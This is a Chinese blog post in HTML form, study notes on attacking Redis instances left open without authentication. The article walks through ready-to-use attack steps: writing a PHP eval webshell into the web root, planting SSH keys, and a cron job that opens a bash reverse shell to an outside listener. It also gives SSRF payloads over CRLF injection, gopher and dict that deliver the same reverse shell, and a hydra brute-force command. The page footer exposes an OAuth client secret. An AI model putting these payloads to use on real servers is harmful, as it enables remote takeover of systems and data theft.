<!DOCTYPE html>
<html>

<head><meta name="generator" content="Hexo 3.9.0">
  
  <title>Redis未授权访问学习笔记 - MINX&#39;s Blog</title>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  
  

  <link rel="shortcut icon" href="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%B0%81%E9%9D%A2/head.png" type="image/png">
  <meta name="description" content="Redis未授权访问学习笔记参考：  https://www.cnblogs.com/-chenxs/p/11749367.html https://blog.csdn.net/guxiaoguo/article/details/78913245 https://xz.aliyun.com/t/4051">
<meta property="og:type" content="article">
<meta property="og:title" content="Redis未授权访问学习笔记">
<meta property="og:url" content="http://iminx.cn/2019/11/02/Redis未授权访问学习笔记/index.html">
<meta property="og:site_name" content="MINX&#39;s Blog">
<meta property="og:description" content="Redis未授权访问学习笔记参考：  https://www.cnblogs.com/-chenxs/p/11749367.html https://blog.csdn.net/guxiaoguo/article/details/78913245 https://xz.aliyun.com/t/4051">
<meta property="og:locale" content="zh-CN">
<meta property="og:updated_time" content="2020-01-29T11:10:12.867Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Redis未授权访问学习笔记">
<meta name="twitter:description" content="Redis未授权访问学习笔记参考：  https://www.cnblogs.com/-chenxs/p/11749367.html https://blog.csdn.net/guxiaoguo/article/details/78913245 https://xz.aliyun.com/t/4051">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/mdui@0.4.3/dist/css/mdui.min.css">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.15.8/styles/atom-one-dark.css">
   
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css">
  
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1038733_0xvrvpg9c0r.css">
  <link rel="stylesheet" href="/css/style.css?v=1584554391863">
</head>

<body class="mdui-drawer-body-left">
  
  <div class="nexmoe-bg" style="background-image: url(https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%B0%81%E9%9D%A2/4.jpg)"></div>
  <div id="nexmoe-header">
      <div class="nexmoe-drawer mdui-drawer" id="drawer">
    <div class="nexmoe-avatar mdui-ripple">
        <a href="/">
            <img src="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%B0%81%E9%9D%A2/head.png">
        </a>
    </div>
    <div class="nexmoe-count">
        <div><span>文章</span>17</div>
        <div><span>标签</span>0</div>
        <div><span>分类</span>8</div>
    </div>
    <ul class="nexmoe-list mdui-list" mdui-collapse="{accordion: true}">
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple" href="/">
            <i class="mdui-list-item-icon nexmoefont icon-home"></i>
            <div class="mdui-list-item-content">
                回到首页
            </div>
        </a>
        
    </ul>
    <aside id="nexmoe-sidebar">
  
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">社交按钮</h3>
    <div class="nexmoe-widget nexmoe-social">
        <a class="mdui-ripple" href="https://github.com/clhclh1/clhclh1.github.io" target="_blank" mdui-tooltip="{content: 'GitHub'}" style="color: rgb(25, 23, 23);background-color: rgba(25, 23, 23, .15);">
            <i class="nexmoefont icon-github"></i>
        </a>
    </div>
</div>
  
  
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">文章分类</h3>
    <div class="nexmoe-widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/AWD/">AWD</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Bypass/">Bypass</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Docker/">Docker</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Linux基础命令/">Linux基础命令</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/SQL注入/">SQL注入</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Web/">Web</a><span class="category-list-count">3</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Writeup/">Writeup</a><span class="category-list-count">4</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/文件上传/">文件上传</a><span class="category-list-count">2</span></li></ul>
    </div>
  </div>


  
  
  
  
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">文章归档</h3>
    <div class="nexmoe-widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/02/">二月 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/11/">十一月 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/10/">十月 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/09/">九月 2019</a></li></ul>
    </div>
  </div>


  
</aside>
    <div class="nexmoe-copyright">
        &copy; 2020 MINX
        Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
        & <a href="https://nexmoe.com/hexo-theme-nexmoe.html" target="_blank">Nexmoe</a>
    </div>
</div><!-- .nexmoe-drawer -->

<script>
    const getRealPath = (pathname, desc = false) => {
        if (!pathname) {
            pathname = window.location.pathname
        }
        let names = pathname.split("/")
        if (desc === false) {
            for (let i = names.length - 1; i >= 0; --i) {
                let name = names[i].trim()
                if (name.length > 0 && name !== "/" && name !== "index.html") {
                    return name
                }
            }
        } else {
            for (let i = 0; i < names.length; ++i) {
                let name = names[i].trim()
                if (name.length > 0 && name !== "/" && name !== "index.html") {
                    return name
                }
            }
        }
        return "/"
    }
    let links = document.querySelectorAll('.nexmoe-list-item');
    let rootRealPath = getRealPath(window.location.pathname, true);
    for (let link of links) {
        let linkPath = link.getAttribute("href");
        if (linkPath && getRealPath(linkPath, true) === rootRealPath) {
            link.className = "active nexmoe-list-item mdui-list-item mdui-ripple";
        }
    }
</script>
  </div>
  <div id="nexmoe-content">
    <div class="nexmoe-primary">
        <div class="nexmoe-tab">
            <a mdui-drawer="{target: '#drawer', swipe: true}">
              <i class="mdui-icon material-icons">menu</i>
            </a>
          </div>
        <div class="nexmoe-post">
    <div class="nexmoe-post-cover"> 
        
        <img src="https://iminx-1258939911.cos.ap-chengdu.myqcloud.com/%E5%B0%81%E9%9D%A2/8.jpg">
        
        <h1>Redis未授权访问学习笔记</h1>
    </div>
  <div class="nexmoe-post-meta">
    <a><i class="nexmoefont icon-calendar-fill"></i>2019年11月02日</a>
    <a><i class="nexmoefont icon-areachart"></i>1,061 字</a>
    <a><i class="nexmoefont icon-time-circle-fill"></i>大概 5 分钟</a>
    
      <a class="nexmoefont icon-appstore-fill -link" href="/categories/Web/">Web</a>
    
    
  </div>
  <article>
    <p>Redis未授权访问学习笔记<br>参考：</p>
<ol>
<li><a href="https://www.cnblogs.com/-chenxs/p/11749367.html" target="_blank" rel="noopener">https://www.cnblogs.com/-chenxs/p/11749367.html</a></li>
<li><a href="https://blog.csdn.net/guxiaoguo/article/details/78913245" target="_blank" rel="noopener">https://blog.csdn.net/guxiaoguo/article/details/78913245</a></li>
<li><a href="https://xz.aliyun.com/t/4051" target="_blank" rel="noopener">https://xz.aliyun.com/t/4051</a><a id="more"></a>

</li>
</ol>
<h1 id="Redis是什么"><a href="#Redis是什么" class="headerlink" title="Redis是什么"></a>Redis是什么</h1><p>Redis是一款NOSQL数据库，为了保证效率，其数据是缓存在内存中的，但是会周期性的把数据写入磁盘或者把修改操作写入追加的目录文件。同时是key-value型数据库，支持string、list、set（集合）、zset（有序集合）、hash类型的数据</p>
<h1 id="漏洞简介"><a href="#漏洞简介" class="headerlink" title="漏洞简介"></a>漏洞简介</h1><p>部分服务器将Redis绑定在6379端口并且默认没有开启认证，同时该端口可以在公网直接访问，如果没有进行相关的配置检测，将导致数据直接暴露在公网上，就会造成未授权访问。</p>
<h1 id="攻击方法"><a href="#攻击方法" class="headerlink" title="攻击方法"></a>攻击方法</h1><h3 id="攻击之前先看看一些基本命令"><a href="#攻击之前先看看一些基本命令" class="headerlink" title="攻击之前先看看一些基本命令"></a>攻击之前先看看一些基本命令</h3><ol>
<li>连接Redis<br><code>redis-cli.exe -h 192.168.107.044</code></li>
<li>查看键为x的值<code>get x</code></li>
<li>get所有key<code>ksys *</code></li>
<li>删除键为key的数据<code>del key</code> </li>
<li>删除所有键<code>flushall</code></li>
</ol>
<h3 id="接下来看看如何利用漏洞"><a href="#接下来看看如何利用漏洞" class="headerlink" title="接下来看看如何利用漏洞"></a>接下来看看如何利用漏洞</h3><ol>
<li>直接连接redis，可以通过<code>telnet 127.0.0.1 6379</code>连接，也可以<code>redis-cli.exe -h 127.0.0.1</code>(linux下删去.exe即可)，连接成功输入info可以查看配置信息，如果是2.8之后的版本还可以看到配置文件的绝对路径。接下来就可以进行操作了</li>
<li>如果设置了Redis的密码，可以利用hydra工具爆破<code>hydra -P passwd.txt redis://127.0.0.1</code> hydra使用可见：<a href="https://blog.51cto.com/jzking121/1770605" target="_blank" rel="noopener">https://blog.51cto.com/jzking121/1770605</a></li>
<li>往网站目录中写入webshell：<pre><code>config set dbfilename webshell.php
config set dir /var/www/html
set x &quot;&lt;?php @eval($_POST[&#39;c&#39;]); ?&gt;&quot;
save</code></pre></li>
<li>写入ssh公钥<pre><code>set dir /root/.ssh
dbfilename pub_keys
set x &quot;公钥&quot;
save</code></pre></li>
<li>利用Redis执行命令<br>Redis2.6以前的版本内置了lus环境，可以利用lua执行系统命令：<br>先写一个lua脚本,之后就可以在redis执行命令：<code>redis-cli eval &quot;$(cat hello.lua)&quot; 0 -h 127.0.0.1&quot;</code></li>
<li>反弹shell<br>原理和写入公钥一样，改一下内容和目录：<pre><code>set xxx &quot;\n\n*/1 * * * * /bin/bash -i&gt;&amp;/dev/tcp/192.168.152.129/4444 0&gt;&amp;1\n\n&quot;
config set dir /var/spool/cron
config set dbfilename root
save</code></pre>此时也可以通过header CRLF 注入方式反弹shell。这里是采用的bash反弹，在ubuntu下不会反弹成功，CentOS可以反弹成功；路径采用的是/etc/crontab。payload:<code>http://xxx.xxx.xx.xx/xx/xx.php?url=http://172.21.0.2:6379/
test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.220.140%2F2333%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa</code></li>
<li>利用CURL命令、gopher协议以及dict协议方式攻击<br>curl+gopher的payload:<pre><code>curl -v &#39;http://xxx.xxx.xx.xx/xx.php?url=
gopher://172.21.0.2:6379/
_*1%250d%250a%248%250d%250aflushall%250d%250a%2a3%250d%250a%243%250d%250aset%250d%250a%241%250d%250a1%250d%250a%2464%250d%250a%250d%250a%250a%250a%2a%2f1%20%2a%20%2a%20%2a%20%2a%20bash%20-i%20%3E%26%20%2fdev%2ftcp%2f192.168.220.140%2f2333%200%3E%261%250a%250a%250a%250a%250a%250d%250a%250d%250a%250d%250a%2a4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%243%250d%250adir%250d%250a%2416%250d%250a%2fvar%2fspool%2fcron%2f%250d%250a%2a4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%2410%250d%250adbfilename%250d%250a%244%250d%250aroot%250d%250a%2a1%250d%250a%244%250d%250asave%250d%250aquit%250d%250a&#39;</code></pre>redis命令进行了两次url编码，这里是通过gopher协议伪造的请求包用curl命令来发送；<br>payload采用的是bash反弹，定时程序路径是/var/spool/cron/root<br>发送请求之前在公网机192.168.220.140开启nc监听端口2333<br>dict协议方式攻击:<br>关于dict协议：<br>　　1. dict://serverip:port/命令:参数<br>　　2. 向服务器的端口请求 命令:参数，并在末尾自动补上\r\n(CRLF)，为漏洞利用增添了便利</li>
</ol>
<p>如果服务端不支持gopher协议，可尝试dict协议，不过通过dict协议的话要一条一条的执行，而gopher协议执行一条命令就行了。</p>
<p>curl扩展也支持dict协议，可以配合curl命令发送请求，但也可以直接在浏览器上或者bp发包请求。<br>payload和前面的差不都，详细的可以看:’<a href="https://www.cnblogs.com/-chenxs/p/11749367.html&#39;" target="_blank" rel="noopener">https://www.cnblogs.com/-chenxs/p/11749367.html&#39;</a></p>

  </article>
  
    
<div class="nexmoe-post-copyright">
<i class="mdui-list-item-icon nexmoefont icon-info-circle"></i>
<strong>本文作者：</strong>MINX<br>
<strong>本文链接：</strong><a href="http://iminx.cn/2019/11/02/Redis未授权访问学习笔记/" title="http://iminx.cn/2019/11/02/Redis未授权访问学习笔记/" target="_blank" rel="noopener">http://iminx.cn/2019/11/02/Redis未授权访问学习笔记/</a><br>

  <strong>版权声明：</strong>本文采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/cn/deed.zh" target="_blank">CC BY-NC-SA 3.0 CN</a> 协议进行许可 <br> <a href="http://www.miitbeian.gov.cn/">闽ICP备19007766号</a>

</div>

<div class="BbeiAn-info"">
  {{ __('闽ICP备') }} -
  <a href="http://www.miitbeian.gov.cn/">19007766号</a>
  
</div>
{% endif %}
  
  <section class="nexmoe-comment">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1.5.0/dist/gitalk.min.css">
<div id="gitalk"></div>
<script src="https://cdn.jsdelivr.net/npm/gitalk@1.5.0/dist/gitalk.min.js"></script>
<script type="text/javascript">
    var gitalk = new Gitalk({
        clientID: '80b2453b6d5f37ad6225',
        clientSecret: '43e99fa852795c9a7b3eb924b2558c64b84bbdeb',
        id: window.location.pathname,
        repo: 'nexmoe.github.io',
        owner: 'nexmoe',
        admin: 'nexmoe'
    })
    gitalk.render('gitalk')
</script>
</section>
</div>
    </div>
  </div>
  <script src="https://cdn.jsdelivr.net/npm/mdui@0.4.3/dist/js/mdui.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js"></script>
 
    <script src="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script>


 
    <script src="https://cdn.jsdelivr.net/npm/smoothscroll-for-websites@1.4.9/SmoothScroll.min.js"></script>


<script src="https://cdn.jsdelivr.net/gh/highlightjs/cdn-release@9.15.8/build/highlight.min.js"></script>
<script>hljs.initHighlightingOnLoad();</script>

<script src="/js/app.js?v=1584554391843"></script>
<script src="https://cdn.jsdelivr.net/npm/lazysizes@5.1.0/lazysizes.min.js"></script>
<br>
<a href="http://www.miitbeian.gov.cn/">闽ICP备19007766号</a>
  





<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>

</html>